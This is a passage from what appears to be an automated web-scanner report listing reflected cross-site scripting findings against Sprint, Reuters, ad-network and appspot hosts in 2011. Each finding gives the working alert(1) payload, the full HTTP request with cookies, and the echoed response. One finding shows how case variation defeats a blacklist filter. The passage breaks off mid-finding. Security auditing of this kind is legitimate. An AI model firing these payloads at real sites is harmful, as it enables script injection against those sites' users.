User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:26 GMT
Server: Apache-Coyote/1.1
X-JAL: 10
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=129521 t=1315099166685309
Connection: close
Content-Length: 40559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
ar profileLoadingTooltip = "Loading user profile";
var profileErrorTooltip = "There was an error loading that profile information.";

var projectChooserUrl = "/baw/community/sprintblogs4ba4c";alert(1)//4747f9a3021/buzz-by-sprint/project-chooser!input.jspa";

var containerShortUrl = "/baw/container-short.jspa";
var containerLoadingTooltip = "Loading place information.";
var containerError
...[SNIP]...

5.49. http://community.sprint.com/baw/community/sprintblogs/buzz-by-sprint/sprint-video [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/community/sprintblogs/buzz-by-sprint/sprint-video

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bcde9"%3balert(1)//a061888315 was submitted in the REST URL parameter 4. This input was echoed as bcde9";alert(1)//a061888315 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /baw/community/sprintblogs/buzz-by-sprintbcde9"%3balert(1)//a061888315/sprint-video HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:35 GMT
Server: Apache-Coyote/1.1
X-JAL: 8
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=199323 t=1315099175395176
Connection: close
Content-Length: 40556

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
ngTooltip = "Loading user profile";
var profileErrorTooltip = "There was an error loading that profile information.";

var projectChooserUrl = "/baw/community/sprintblogs/buzz-by-sprintbcde9";alert(1)//a061888315/project-chooser!input.jspa";

var containerShortUrl = "/baw/container-short.jspa";
var containerLoadingTooltip = "Loading place information.";
var containerErrorTooltip = "Ther
...[SNIP]...

5.50. http://community.sprint.com/baw/community/sprintblogs/buzz-by-sprint/sprint-video [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/community/sprintblogs/buzz-by-sprint/sprint-video

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67397"><ScRiPt>alert(1)</ScRiPt>ceee10a73cf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /baw/community/sprintblogs/buzz-by-sprint67397"><ScRiPt>alert(1)</ScRiPt>ceee10a73cf/sprint-video HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:34 GMT
Server: Apache-Coyote/1.1
X-JAL: 8
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=162814 t=1315099174017960
Connection: close
Content-Length: 40604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<form action="/baw/community/sprintblogs/buzz-by-sprint67397"><ScRiPt>alert(1)</ScRiPt>ceee10a73cf/search.jspa" method="get" id="jive-userbar-search-form">
...[SNIP]...

5.51. http://img.mediaplex.com/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66de4'%3balert(1)//23d1f4a63b3 was submitted in the mpck parameter. This input was echoed as 66de4';alert(1)//23d1f4a63b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-135615-9432-62%3Fmpt%3D35795102566de4'%3balert(1)//23d1f4a63b3&mpt=357951025&mpvc=http://c.casalemedia.com/c/1/1/89733/ HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/89733/235451/index.html?g=Af////8=&r=www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=993782327310; mojo2=3484:8030; mojo3=10105:9432/13966:3335/3484:36959

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:55:23 GMT
Server: Apache
Last-Modified: Thu, 01 Sep 2011 01:13:50 GMT
ETag: "836c99-1012-4abd6f5152f80"
Accept-Ranges: bytes
Content-Length: 4598
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<a href="http://c.casalemedia.com/c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62?mpt=35795102566de4';alert(1)//23d1f4a63b3" target="_blank">
...[SNIP]...

5.52. http://img.mediaplex.com/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0a59"-alert(1)-"3dcd426b95b was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-135615-9432-62%3Fmpt%3D357951025e0a59"-alert(1)-"3dcd426b95b&mpt=357951025&mpvc=http://c.casalemedia.com/c/1/1/89733/ HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/89733/235451/index.html?g=Af////8=&r=www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=993782327310; mojo2=3484:8030; mojo3=10105:9432/13966:3335/3484:36959

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:55:20 GMT
Server: Apache
Last-Modified: Thu, 01 Sep 2011 01:13:50 GMT
ETag: "836c99-1012-4abd6f5152f80"
Accept-Ranges: bytes
Content-Length: 4592
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F10105-135615-9432-62%3Fmpt%3D357951025e0a59"-alert(1)-"3dcd426b95b");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F10105-135615-9432-62%3Fmpt%3D357951025e0a59"-alert(1)-"3dcd426b95b");
mpck =
...[SNIP]...

5.53. http://img.mediaplex.com/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6e5e"%3balert(1)//5a3f34f4b67 was submitted in the mpvc parameter. This input was echoed as c6e5e";alert(1)//5a3f34f4b67 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-135615-9432-62%3Fmpt%3D357951025&mpt=357951025&mpvc=http://c.casalemedia.com/c/1/1/89733/c6e5e"%3balert(1)//5a3f34f4b67 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/89733/235451/index.html?g=Af////8=&r=www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=993782327310; mojo2=3484:8030; mojo3=10105:9432/13966:3335/3484:36959

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:55:33 GMT
Server: Apache
Last-Modified: Thu, 01 Sep 2011 01:13:50 GMT
ETag: "836c99-1012-4abd6f5152f80"
Accept-Ranges: bytes
Content-Length: 4594
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpvce/>';
if (mpvce == 1) {
mpvclick = encodeURIComponent("http://c.casalemedia.com/c/1/1/89733/c6e5e";alert(1)//5a3f34f4b67");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://c.casalemedia.com/c/1/1/89733/c6e5e";alert(1)//5a3f34f4b67");
mpvc = encodeURIComponent(mpvclick2);
}
else
{
mpvc
...[SNIP]...

5.54. http://img.mediaplex.com/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4785'%3balert(1)//c24c09353c6 was submitted in the mpvc parameter. This input was echoed as a4785';alert(1)//c24c09353c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-135615-9432-62%3Fmpt%3D357951025&mpt=357951025&mpvc=http://c.casalemedia.com/c/1/1/89733/a4785'%3balert(1)//c24c09353c6 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/89733/235451/index.html?g=Af////8=&r=www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=993782327310; mojo2=3484:8030; mojo3=10105:9432/13966:3335/3484:36959

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:55:35 GMT
Server: Apache
Last-Modified: Thu, 01 Sep 2011 01:13:50 GMT
ETag: "836c99-1012-4abd6f5152f80"
Accept-Ranges: bytes
Content-Length: 4594
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<a href="http://c.casalemedia.com/c/1/1/89733/a4785';alert(1)//c24c09353c6http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62?mpt=357951025" target="_blank">
...[SNIP]...

5.55. http://imp.fetchback.com/serve/fb/adtag.js [clicktrack parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the clicktrack request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73ced"-alert(1)-"46bd39e34f8 was submitted in the clicktrack parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=68285&type=mrect&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-15.3214998.3237979?url=73ced"-alert(1)-"46bd39e34f8 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315097051_34024:68283:2:0:92_34024:68292:2:118888:118970_34023:68293:1:119601:119601; uid=1_1315097051_1314893682667:5756480826433243; kwd=1_1315097051; scg=1_1315097051; ppd=1_1315097051; act=1_1315097051

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:37 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315097677_1314893682667:57564808264332431; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:54:37 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 00:54:37 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 323

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68285&type=mrect&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-15.3214998.3237979?url=73ced"-alert(1)-"46bd39e34f8' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

5.56. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0c23"-alert(1)-"d0a07ccec42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=68285&type=mrect&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-15.3214998.3237979?url=&e0c23"-alert(1)-"d0a07ccec42=1 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315097051_34024:68283:2:0:92_34024:68292:2:118888:118970_34023:68293:1:119601:119601; uid=1_1315097051_1314893682667:5756480826433243; kwd=1_1315097051; scg=1_1315097051; ppd=1_1315097051; act=1_1315097051

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:43 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: uid=1_1315097683_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:54:43 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 00:54:43 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 326

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68285&type=mrect&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-15.3214998.3237979?url=&e0c23"-alert(1)-"d0a07ccec42=1' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

5.57. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3517f"-alert(1)-"f1d43df6b5a was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=68285&type=mrect3517f"-alert(1)-"f1d43df6b5a&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-15.3214998.3237979?url= HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315097051_34024:68283:2:0:92_34024:68292:2:118888:118970_34023:68293:1:119601:119601; uid=1_1315097051_1314893682667:5756480826433243; kwd=1_1315097051; scg=1_1315097051; ppd=1_1315097051; act=1_1315097051

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:35 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315097675_1314893682667:57564808264332431; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:54:35 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 00:54:35 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 323

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68285&type=mrect3517f"-alert(1)-"f1d43df6b5a&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-15.3214998.3237979?url=' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

5.58. http://jlinks.industrybrains.com/jsct [ct parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The value of the ct request parameter is copied into the HTML document as plain text between tags. The payload c816f<script>alert(1)</script>a389a443772 was submitted in the ct parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=851&ct=REUTERS_INVESTINGc816f<script>alert(1)</script>a389a443772&tr=NEWS_MARKETS&num=4&layt=1&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Connection: close
Date: Sun, 04 Sep 2011 00:47:52 GMT
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Sun, 04 Sep 2011 00:47:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 88

// Error: Unknown old section REUTERS_INVESTINGc816f<script>alert(1)</script>a389a443772

5.59. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4ad85<script>alert(1)</script>5f200bad0a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=851&ct=REUTERS_INVESTING&tr=NEWS_MARKETS&num=4&layt=1&fmt=simp&4ad85<script>alert(1)</script>5f200bad0a2=1 HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Connection: close
Date: Sun, 04 Sep 2011 00:47:56 GMT
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Sun, 04 Sep 2011 00:47:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 69

// Error: Unknown parameter 4ad85<script>alert(1)</script>5f200bad0a2

5.60. http://jlinks.industrybrains.com/jsct [tr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The value of the tr request parameter is copied into the HTML document as plain text between tags. The payload ad4f4<script>alert(1)</script>7e2e605e666 was submitted in the tr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=851&ct=REUTERS_INVESTING&tr=NEWS_MARKETSad4f4<script>alert(1)</script>7e2e605e666&num=4&layt=1&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Connection: close
Date: Sun, 04 Sep 2011 00:47:53 GMT
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Sun, 04 Sep 2011 00:47:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 87

// Error: Site 851 has no section NEWS_MARKETSad4f4<script>alert(1)</script>7e2e605e666

5.61. http://js.www.reuters.com/recommend/re/re [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.www.reuters.com
Path:   /recommend/re/re

Issue detail

The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload acc3f%3balert(1)//8f546b5d95b was submitted in the callback parameter. This input was echoed as acc3f;alert(1)//8f546b5d95b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /recommend/re/re?callback=Reuters.tns.updateRecommendationsacc3f%3balert(1)//8f546b5d95b&ed=us&u=9da0587b-a65b-4bca-a7de-c321e48d355a&refreshUrlTimestamp=1315097335859 HTTP/1.1
Host: js.www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; __qseg=Q_D|Q_T; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.2.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football; rsi_segs=I07714_10272|I07714_10273

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:02:46 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 04 Sep 2011 01:12:47 GMT
max-age: 600000
Content-Type: text/javascript;charset=UTF-8
Content-Length: 157

if (typeof Reuters.tns.updateRecommendationsacc3f;alert(1)//8f546b5d95b === 'function') {Reuters.tns.updateRecommendationsacc3f;alert(1)//8f546b5d95b([]);}

5.62. http://lingows.appspot.com/bubble/ [request_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://lingows.appspot.com
Path:   /bubble/

Issue detail

The value of the request_id request parameter is copied into the HTML document as plain text between tags. The payload 32dc1<img%20src%3da%20onerror%3dalert(1)>26594ea95cf was submitted in the request_id parameter. This input was echoed as 32dc1<img src=a onerror=alert(1)>26594ea95cf in the application's response.

